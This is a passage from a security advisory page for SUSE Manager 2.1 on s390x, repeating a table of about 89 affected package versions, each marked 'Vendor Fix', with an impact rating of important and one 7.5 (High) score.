|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
89 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x | — |
Vendor Fix
|
|
